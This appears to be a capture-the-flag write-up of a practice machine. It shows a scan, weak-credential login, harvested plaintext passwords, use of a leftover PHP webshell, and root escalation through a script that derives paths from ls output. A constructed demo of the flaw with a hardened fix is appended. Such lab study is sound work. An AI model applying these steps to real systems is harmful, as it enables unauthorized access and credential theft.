This post records a hands-on penetration test against a practice target machine. The main steps: an Nmap scan exposed a web-served backup directory and the Cockpit web management service; after logging in with the weak credential test:test, user1's plaintext password and a PHP webshell turned up in the backup files; during privilege escalation, the script /opt/dsz.sh was found to have a logic flaw: renaming the backup directory to a hidden name (mv backup .backup) makes the script's $(ls) return an empty string, so the path concatenation resolves to /root, the script copies the whole of /root to /tmp with 777 permissions, and the root password can be read from the copy to complete the escalation.
Information gathering
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-18 15:16 UTC
Nmap scan report for 192.168.110.218
Host is up (0.00048s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2025-12-16 05:11 backup/
| - 2025-12-16 07:31 backup/root/
| - 2025-12-16 07:32 backup/user1/
| - 2025-12-16 07:32 backup/user2/
|_
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Index of /
9090/tcp open http Cockpit web service 221 - 253
|_http-title: Did not follow redirect to https://192.168.110.218:9090/
MAC Address: 08:00:27:9B:77:32 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.64 seconds
http://192.168.110.218:9090/ is a web-based SSH terminal (Cockpit).
Vulnerability analysis
➜ Set ssh root@192.168.110.218
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
-----use test:test to login-----
----- OpenSSH Server Down -----
root@192.168.110.218's password:
Exploitation
Log in through the web terminal

test@Set:/var/www/html/backup$ ls user1
i3xFNqpty2xyRWw1PAH6_shell.php index.html
test@Set:/var/www/html/backup$ ls user2
index.html
test@Set:/var/www/html/backup$ ls root/
index.html user1_system_password.txt
test@Set:/var/www/html/backup$ cat root/user1_system_password.txt
0I8jV88cyzevAH5KA4ct
This yields the credential user1:0I8jV88cyzevAH5KA4ct and a webshell at http://192.168.110.218/backup/user1/i3xFNqpty2xyRWw1PAH6_shell.php
ssh user1@192.168.110.218 → user.txt
http://192.168.110.218/backup/user1/i3xFNqpty2xyRWw1PAH6_shell.php → shell as the www-data user
Privilege escalation
The file dsz.sh was found in /opt:
#!/bin/bash
# author: ll104567
# date: 2025.12.16
# set -e
web_path="/var/www/html"
cd $web_path
backup_file=$(ls)
root_file="$backup_file/root"
user1_file="$backup_file/user1"
user2_file="$backup_file/user2"
[ -d "$root_file" ] && cp -a $root_file /tmp/root && chmod -R 777 /tmp/root
[ $? -eq 0 ] && echo "Plan 1 ok" || echo "Plan 1 failed"
[ -d "$user1_file" ] && cp -a $user1_file /tmp/user1 && chmod -R 777 /tmp/user1
[ $? -eq 0 ] && echo "Plan 2 ok" || echo "Plan 2 failed"
[ -d "$user2_file" ] && cp -a $user2_file /tmp/user2 && chmod -R 777 /tmp/user2
[ $? -eq 0 ] && echo "Plan 3 ok" || echo "Plan 3 failed"
backup_file=$(ls) is the vulnerable line. Idea: make ls print nothing for the web root (backup → ' ', or backup → .backup), so that root_file="$backup_file/root" collapses to /root.
www-data@Set:…/www/html# mv backup .backup
user1@Set:/var/www/html$ cd /tmp/root/root
user1@Set:/tmp/root/root$ ls
index.html rootpass.bak root.txt user1_system_password.txt
user1@Set:/tmp/root/root$ cat rootpass.bak
QK1emfs2oYtFisVLc096
user1@Set:/tmp/root/root$ su root
Password:
root@Set:/tmp/root/root# id
uid=0(root) gid=0(root) groups=0(root)
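As an added example (not part of the original write-up, and not the box's own file), the script below reproduces the path-concatenation flaw of /opt/dsz.sh inside a throwaway directory and sets a hardened variant beside it. The function names (flawed_root_file, hardened_backup, make_fixture) and the mktemp-based fixture are constructed for this demonstration; nothing touches the real /root or /tmp. The hardened form never derives a path from ls output, refuses to run when the expected directory is absent, and does not make the copy world-writable.

```shell
#!/bin/bash
# Added example: the flawed path derivation from dsz.sh, reproduced on a
# constructed fixture, next to a hardened variant. Names are hypothetical.

# Mirror of the flawed logic: prints what root_file would resolve to.
flawed_root_file() {            # $1 = directory the script would cd into
    cd "$1" || return 1
    local backup_file
    backup_file=$(ls)           # empty when the only entry is a dotfile
    echo "$backup_file/root"    # "" + "/root" = "/root"
}

# Hardened variant: fixed absolute source, explicit existence check,
# no chmod 777 on the result.
hardened_backup() {             # $1 = web root, $2 = destination directory
    local src="$1/backup/root"  # absolute path, not assembled from ls
    local dst="$2/root"
    [ -d "$src" ] || { echo "missing backup dir: $src" >&2; return 1; }
    cp -a -- "$src" "$dst" || return 1
    chmod -R go-rwx -- "$dst"   # owner-only instead of world-writable
    echo "$dst"
}

# Constructed fixture: a fake web root whose backup dir has already been
# renamed to .backup, the state the write-up creates with mv.
make_fixture() {
    local web
    web=$(mktemp -d)
    mkdir -p "$web/.backup/root"
    echo "fixture" > "$web/.backup/root/index.html"
    echo "$web"
}

# Stand-alone run: show both behaviours on the fixture.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    web=$(make_fixture)
    echo "flawed script would use: $(flawed_root_file "$web")"
    out=$(mktemp -d)
    hardened_backup "$web" "$out" || echo "hardened script refused to copy"
fi
```

Run it with bash; the flawed function prints /root while the hardened one refuses because $web/backup/root does not exist. The fix that matters is the first line of hardened_backup: a maintenance script that runs as root must name its inputs with absolute paths rather than trusting whatever a world-writable directory happens to contain.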
Lessons learned